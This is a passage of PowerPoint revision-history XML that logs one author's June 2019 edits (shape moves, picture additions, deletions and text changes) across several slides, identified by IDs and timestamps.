          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:24:55.804" v="625"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="5" creationId="{191CC491-9D7C-4267-9080-C9575711A4F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:13.376" v="656" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="6" creationId="{53E9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:07.673" v="655" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="7" creationId="{0F04E23D-A26E-4029-B989-CC81B51B3DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:01.876" v="654" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="8" creationId="{5B1A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:27:53.595" v="649" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="9" creationId="{D718A3D6-FC8B-4691-A3BA-54C25E2D20F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:44.330" v="660" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:27:53.564" v="648" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="11" creationId="{27CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:24:36.315" v="623"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="12" creationId="{6452865E-E0FD-4169-A23A-B0702A255E41}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:30:15.832" v="423" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="13" creationId="{F96710B7-59FF-4B5B-B88E-0B3275D58AE8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:24:41.209" v="624"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="14" creationId="{C899EB9D-31AD-4FC3-8CC6-63442DB03CEF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:31.080" v="658" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="15" creationId="{D96DA130-F79F-4B78-A80E-33354F80026C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:28:39.017" v="659" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="18" creationId="{DA260270-63F7-4E17-8ECA-5CCA0C71D60E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:52:36.263" v="602" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:picMk id="16" creationId="{8FA16736-F18A-4D55-B938-BABCB3200D9A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:52:18.794" v="599" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:26:21.519" v="392" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="5" creationId="{D1CB152A-E8C6-4642-8761-9A7C31E61713}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:52:10.544" v="598" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="8" creationId="{594532C4-922D-484C-8561-C44201948888}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:52:18.794" v="599" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="10" creationId="{D86248CE-9B72-4003-B5B5-8EC68C4FB040}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:38:07.177" v="503" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="12" creationId="{CD99AA2C-236A-4B98-861F-8DDC522B388B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T20:40:26.731" v="38" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T20:40:26.731" v="38" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="2" creationId="{496DE6F0-0365-4996-86ED-FFF7DE98959E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:37:09.161" v="499" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:36:59.021" v="496" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="5" creationId="{6AA73F9F-6A4A-4B5C-8355-CDB1E8885A7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:37:01.943" v="497" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="6" creationId="{81DFE1AE-A13A-4DAC-9A43-B1A285A26948}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:37:09.161" v="499" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:picMk id="7" creationId="{4FA8F82E-35D7-4541-B455-2A0E171F27B3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T20:53:10.014" v="49" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T20:52:57.811" v="42" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="2" creationId="{C3628ED8-9331-46E5-B8CC-52610F82D4AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T20:53:10.014" v="49" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="3" creationId="{F0C1F75D-E598-4FC4-BE48-3BE97ED4362F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:42:12.782" v="526"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="777082745" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:42:53.777" v="528" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2507243378" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:42:53.777" v="528" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2507243378" sldId="265"/>
            <ac:spMk id="2" creationId="{84DC35D7-C02E-450D-8C32-9B3C6879687D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:45:27.809" v="595" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="458480970" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:45:27.809" v="595" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="3" creationId="{5C06839A-07D9-486F-8E73-76B7F83813F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:40:35.366" v="512" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="5" creationId="{CAF3DF89-A507-4527-8C36-8E1BA28FE08E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:40:49.100" v="515" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:spMk id="6" creationId="{2E827771-FE4C-49C9-ADDF-EA5517120AD0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:40:44.973" v="514" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="458480970" sldId="267"/>
            <ac:picMk id="7" creationId="{C1C523EC-ACDB-4321-AFE1-33420F3E0C39}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:21:19.119" v="606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838342288" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:04:18.922" v="215" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="3" creationId="{C1BEDC9F-AE12-4204-8F4E-BF3F1B8AA6F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:04:34.079" v="218" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="4" creationId="{9DBE4462-2011-4557-9006-41193033731F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:11:34.251" v="270" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="6" creationId="{D9015465-6EB7-4351-B478-AB5BC688F149}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:04:27.938" v="217" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="7" creationId="{C7F1086E-4778-4E50-8993-A1E3113307A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T20:57:44.453" v="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="8" creationId="{4100B557-21EC-4B67-A1A4-F6B924C58E94}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:04:43.282" v="220" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="9" creationId="{8275A94C-3D30-4E49-9945-21C540B2810B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:04:09.875" v="212" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="13" creationId="{7BBAD014-44E3-4389-876A-A7901BAAD8BE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:05:06.438" v="225" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="14" creationId="{D5C8A1F7-9EF7-4639-9B05-3DF76595841A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:04:37.329" v="219" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="15" creationId="{055EF1B4-789C-4E64-8BE5-7CAF17B00D35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:02:03.719" v="170"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="16" creationId="{54FF91D7-226E-4CA5-9D9A-2578E1C576D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:06:04.251" v="259" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="17" creationId="{8D321CEA-CEEA-4491-B3C8-79E20B5B1920}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:21:07.649" v="605"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:picMk id="10" creationId="{FC1524B6-C358-40D3-9C16-5C886352CF05}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T23:21:19.119" v="606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:picMk id="12" creationId="{9D04CF17-C5BB-4AED-878D-4A40796184B3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:19:54.971" v="383" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1408271386" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:16:49.049" v="282" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="2" creationId="{7981C555-D780-48C2-BF22-749C37BE657E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:16:50.940" v="284"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="3" creationId="{B2239325-B1E9-49C0-A08E-413226AC1481}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:17:05.846" v="286" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="5" creationId="{F3F015C1-4E03-433D-BF3E-B033B779896E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:19:54.971" v="383" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="6" creationId="{0C038C7A-093F-42FC-87D4-918701F59C29}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{12439EB3-779D-4419-A38F-131004D551F1}" dt="2019-06-05T21:19:39.487" v="379" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="7" creationId="{13DDC5EC-89F9-4E45-86F7-A163FDF29919}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:31:34.511" v="1208" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:31:34.511" v="1208" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
